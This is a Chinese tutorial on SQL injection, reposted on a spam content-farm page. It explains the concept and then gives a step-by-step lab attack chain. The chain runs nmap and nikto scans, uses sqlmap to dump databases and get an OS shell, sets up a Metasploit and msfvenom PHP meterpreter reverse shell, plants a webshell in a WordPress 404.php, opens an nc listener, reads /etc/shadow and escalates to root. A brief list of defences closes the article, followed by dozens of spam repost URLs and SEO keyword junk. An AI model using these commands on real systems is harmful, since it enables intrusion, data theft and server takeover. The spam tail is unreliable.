当前位置: 首页 > news >正文 网站风格设计怎么写广西建设厅网站首页 news 2025/10/26 5:08:12 网站风格设计怎么写,广西建设厅网站首页,百度推广的费用,cpa广告联盟网站建设教程1 SQL注入漏洞利用及防范 1 SQL注入的地位 2 SQL注入的危害及本质 这些危害包括但不局限于#xff1a; 数据库信息泄漏#xff1a;数据库中存放的用户的隐私信息的泄露。网页篡改#xff1a;通过操作数据库对特定网页进行篡改。网站被挂马#xff0c;传播恶意软件#…1 SQL注入漏洞利用及防范 1 SQL注入的地位 2 SQL注入的危害及本质 这些危害包括但不局限于 数据库信息泄漏数据库中存放的用户的隐私信息的泄露。网页篡改通过操作数据库对特定网页进行篡改。网站被挂马传播恶意软件修改数据库一些字段的值嵌入网马链接进行挂马攻击。数据库被恶意操作数据库服务器被攻击数据库的系统管理员帐户被窜改。服务器被远程控制被安装后门。经由数据库服务器提供的操作系统支持让黑客得以修改或控制操作系统。破坏硬盘数据瘫痪全系统。 3 本质 把用户输入的数据当作代码执行。 包含两个关键条件 一用户能够控制输入二原本程序要执行的代码拼接了用户输入的数据。 4 SQL注入原理 5 SQL注入漏洞的方法 这是一个登陆页面 Ø 点击“submit”之后web应用会执行 Ø 接收发送的POST请求 Ø 获取用户名和密码bart, simpson) Ø 构建SQL语句select * from users where username ‘bart’ and password ‘simpson’; Ø 发送给数据库服务器来验证Ø 这个时候我们可以对username进行变化 Ø 输入的用户名不是简单的bart,而是 bart’ and 11; – Ø 这样整个语句变成如下 Ø select * from users where username ‘bart’ and 11; – ’ and password ‘simpson’; Ø 这个时候–后面的都会变成注释不用密码就能进行登陆。 6 SQL注入经常出没的地方 简言之1. 用户一切可以输入可控的地方 。2.数据库一切可能导入、导出的东西。 7 SQL注入的分类 8 演练SQL注入GET参数 8.1 信息探测 扫描主机服务信息以及服务版本 nmap -sV 靶场IP地址快速扫描主机全部信息 nmap -T4 –A -v 靶场IP地址探测敏感信息 nikto -host http://靶场IP地址:端口 dirb http://8.2 深入挖掘 分析nmap 、nikto扫描结果并对结果进行分析挖掘可以利用的信息 使用浏览器打开 http://ip:port/敏感页面查看敏感信息找到可利用的位置 8.3 漏洞扫描 web漏洞扫描器 owasp-zap OWASP ZAP攻击代理服务器是世界上最受欢迎的免费安全工具之一。ZAP可以帮助您在开发和测试应用程序过程中自动发现 Web应用程序中的安全漏洞。另外它也是一款提供给具备丰富经验的渗透测试人员进行人工安全测试的优秀工具。 8.4 使用sqlmap利用SQL查看注入 8.5 漏洞利用 针对web进行漏洞扫描 对扫描的结果进行分析。注意如果具有SQL注入漏洞可以直接利用。毕竟SQL注入是高危漏洞可以直接获取服务器权限。 使用sqlmap利用SQL注入漏洞 sqlmap -u url --dbs 查看数据库名 sqlmap -u url –D “数据库名” --tables 查看对应数据库中的数据表 sqlmap -u url –D “数据库名” –T “表名” --columns 查看对应字段 sqlmap -u url –D “数据库名” –T “表名”-C “列名” --dump 查看对应字段的值 也可以直接尝试 sqlmap –u url –os-shell 直接获取shell8.6 上传shell反弹权限 攻击机启动监听 msf use exploit/multi/handler msf exploit(handler) set payload php/meterpreter/reverse_tcp msf exploit(handler) set lhost 攻击机IP地址 msf exploit(handler) set lport 4444 msf exploit(handler) run生成反弹shell msfvenom -p php/meterpreter/reverse_tcp lhost攻击机IP地址 lport4444 -f raw /root/Desktop/shell.php上传shell执行shell 绕过过滤机制 利用 .php 修改为 .PHP9 演练POST注入 9.1 信息探测 扫描主机服务信息以及服务版本 nmap -sV 靶场IP地址快速扫描主机全部信息 nmap -T4 –A -v 靶场IP地址探测敏感信息 nikto -host http://靶场IP地址:端口 dirb http://靶场IP地址:端口9.2 漏洞扫描 漏洞扫描器 Owasp-zap 功能强大专注于web安全的漏洞扫描器。 9.3 漏洞利用 针对web进行漏洞扫描 对扫描的结果进行分析。注意如果具有SQL注入漏洞可以直接利用。毕竟SQL注入是高危漏洞可以直接获取服务器权限。但是扫描结果也不一定正确。 使用sqlmap利用SQL注入漏洞 sqlmap –r request.raw –level 5 –risk 3 –dbs –dbms mysql --batch sqlmap –r request.raw –level 5 –risk 3 –D 数据库名 –tables 查看对应数据库中的数据表 --batch sqlmap –r request.raw –level 5 –risk 3 –D 数据库名 –T 表名 –columns 查看对应字段 --batch sqlmap –r request.raw –level 5 –risk 3 –D 数据库名 –T 表名-C 列名 –dump --batch9.4 上传webshell获取控制权 wordpress 后台寻找上传点 主题 的404.php 可以上传webshell webshell 获取 /usr/share/webshells/php/ 执行shell获取反弹shell。 http://靶场IP地址:端口号/目录/wp-content/themes/主题名/404.php 启动监听 – nc –nlvp port 启动终端 – python –c “import pty;pty.spawn(‘/bin/bash’)” 9.5 root权限 使用 cat /etc/shadow cat /etc/passwd 查看敏感文件 使用su - 提升 root权限 9.6 SQL注入的防范 防止SQL注入的根本措施是应该在程序中对用户的输入进行检测。总的来说有以下几点 1.永远不要信任用户的输入要对用户的输入进行校验可以通过正则表达式或限制长度对单引号和双“-”进行转换等。 2.永远不要使用动态拼装SQL可以使用参数化的SQL或者直接使用存储过程进行数据查询存取。 3.永远不要使用管理员权限的数据库连接为每个应用使用单独的权限有限的数据库连接。 4.不要把机密信息明文存放请加密或者Hash掉密码和敏感的信息。 5.应用的异常信息应该给出尽可能少的提示最好使用自定义的错误信息对原始错误信息进行包装把异常信息存放在独立的表中。 文章转载自: http://www.morning.rhmk.cn.gov.cn.rhmk.cn http://www.morning.taojava.cn.gov.cn.taojava.cn http://www.morning.qbfs.cn.gov.cn.qbfs.cn http://www.morning.wbllx.cn.gov.cn.wbllx.cn http://www.morning.wqfrd.cn.gov.cn.wqfrd.cn http://www.morning.rnhh.cn.gov.cn.rnhh.cn http://www.morning.nkbfc.cn.gov.cn.nkbfc.cn http://www.morning.hnrqn.cn.gov.cn.hnrqn.cn http://www.morning.prls.cn.gov.cn.prls.cn http://www.morning.lwbhw.cn.gov.cn.lwbhw.cn http://www.morning.tnhg.cn.gov.cn.tnhg.cn http://www.morning.lbxhy.cn.gov.cn.lbxhy.cn http://www.morning.rfgc.cn.gov.cn.rfgc.cn http://www.morning.pdghl.cn.gov.cn.pdghl.cn http://www.morning.qkrz.cn.gov.cn.qkrz.cn http://www.morning.rcjqgy.com.gov.cn.rcjqgy.com http://www.morning.rnmmh.cn.gov.cn.rnmmh.cn http://www.morning.yqtry.cn.gov.cn.yqtry.cn http://www.morning.rbkml.cn.gov.cn.rbkml.cn http://www.morning.spnky.cn.gov.cn.spnky.cn http://www.morning.hryhq.cn.gov.cn.hryhq.cn http://www.morning.sgjw.cn.gov.cn.sgjw.cn http://www.morning.khfk.cn.gov.cn.khfk.cn http://www.morning.gxcit.com.gov.cn.gxcit.com http://www.morning.lbggk.cn.gov.cn.lbggk.cn http://www.morning.dhyzr.cn.gov.cn.dhyzr.cn http://www.morning.ftzll.cn.gov.cn.ftzll.cn http://www.morning.ymhjb.cn.gov.cn.ymhjb.cn http://www.morning.fpzz1.cn.gov.cn.fpzz1.cn http://www.morning.nckjk.cn.gov.cn.nckjk.cn http://www.morning.nmfml.cn.gov.cn.nmfml.cn http://www.morning.ssqwr.cn.gov.cn.ssqwr.cn http://www.morning.xbdd.cn.gov.cn.xbdd.cn http://www.morning.srmpc.cn.gov.cn.srmpc.cn http://www.morning.zrpys.cn.gov.cn.zrpys.cn http://www.morning.fpzz1.cn.gov.cn.fpzz1.cn http://www.morning.wjhnx.cn.gov.cn.wjhnx.cn http://www.morning.fssmx.com.gov.cn.fssmx.com http://www.morning.nwzcf.cn.gov.cn.nwzcf.cn http://www.morning.qklff.cn.gov.cn.qklff.cn http://www.morning.jxtbr.cn.gov.cn.jxtbr.cn http://www.morning.wschl.cn.gov.cn.wschl.cn http://www.morning.rqmqr.cn.gov.cn.rqmqr.cn http://www.morning.zlff.cn.gov.cn.zlff.cn http://www.morning.cokcb.cn.gov.cn.cokcb.cn http://www.morning.nxwk.cn.gov.cn.nxwk.cn http://www.morning.zfwjh.cn.gov.cn.zfwjh.cn http://www.morning.rcmcw.cn.gov.cn.rcmcw.cn http://www.morning.kpcjl.cn.gov.cn.kpcjl.cn http://www.morning.brjq.cn.gov.cn.brjq.cn http://www.morning.jwpcj.cn.gov.cn.jwpcj.cn http://www.morning.bxch.cn.gov.cn.bxch.cn http://www.morning.phnbd.cn.gov.cn.phnbd.cn http://www.morning.pzjrm.cn.gov.cn.pzjrm.cn http://www.morning.jfbgn.cn.gov.cn.jfbgn.cn http://www.morning.nynpf.cn.gov.cn.nynpf.cn http://www.morning.xxlz.cn.gov.cn.xxlz.cn http://www.morning.hnhgb.cn.gov.cn.hnhgb.cn http://www.morning.zqdhr.cn.gov.cn.zqdhr.cn http://www.morning.pjyrl.cn.gov.cn.pjyrl.cn http://www.morning.ftrpvh.cn.gov.cn.ftrpvh.cn http://www.morning.hnmbq.cn.gov.cn.hnmbq.cn http://www.morning.lqgtx.cn.gov.cn.lqgtx.cn http://www.morning.tfgkq.cn.gov.cn.tfgkq.cn http://www.morning.zzjpy.cn.gov.cn.zzjpy.cn http://www.morning.hmsong.com.gov.cn.hmsong.com http://www.morning.ldynr.cn.gov.cn.ldynr.cn http://www.morning.rsbqq.cn.gov.cn.rsbqq.cn http://www.morning.rwcw.cn.gov.cn.rwcw.cn http://www.morning.jfcbs.cn.gov.cn.jfcbs.cn http://www.morning.bdgb.cn.gov.cn.bdgb.cn http://www.morning.wanjia-sd.com.gov.cn.wanjia-sd.com http://www.morning.tyrlk.cn.gov.cn.tyrlk.cn http://www.morning.nkbfc.cn.gov.cn.nkbfc.cn http://www.morning.nqrdx.cn.gov.cn.nqrdx.cn http://www.morning.srckl.cn.gov.cn.srckl.cn http://www.morning.kkdbz.cn.gov.cn.kkdbz.cn http://www.morning.thlr.cn.gov.cn.thlr.cn http://www.morning.nktxr.cn.gov.cn.nktxr.cn http://www.morning.smkxm.cn.gov.cn.smkxm.cn 查看全文 http://www.tj-hxxt.cn/news/250124.html 相关文章: 网站优化标准建筑工程网登 做网站的如何增加电话量做网站属于程序员吗 建销售网站需要多少钱前端做网站维护 优秀网站建设平台wordpress设置标题关键词 网站后台如何做产品展示做设计在哪个网站投递简历 建昌县城乡规划建设局网站网站建设与管理结课论文 松江建设机械网站wordpress导航站主题 中山网站建设联系电话什么是网络营销网络营销的主要工具有哪些 手机wap网站大全广州注册公司最新流程 网站内容一样影响收录网页与网站 学校网站建设栏目设置把一个网站挂到网上要怎么做 毕业设计 网站建设wordpress怎么屏蔽国外IP 哈尔滨网站如何制作中国站长查询域名备案 织梦网站上线品牌设计包装 济南城市建设集团网站个人网站源码进一品资源 网站建设 总结重庆任务盟网站建设 律师做网络推广哪个网站好深圳市营销型网站建设 游戏网站平台怎么做特种证书查询入口 在线服务器网站网站程序包括数据库和网页程序 关于百度网站是多少微信小程序源码免费下载 网站导航网站开发国有资产处网站建设 海关总署2018年海关网站建设巩义做网站汉狮网络 dede网站不能访问wordpress模版安装 建设档案员证书查询网站浏览器提醒 WordPress 网站文章页的排名怎么做wordpress数据库端口 苏州网站建设情况威海网站建设威海 做外销网站营销成功案例分享及感悟 一般的网站是由什么语言做的中国最强十大私企 网站建设制度制定河北省网络科技网站 网站排名高权重低电商网站设计案例
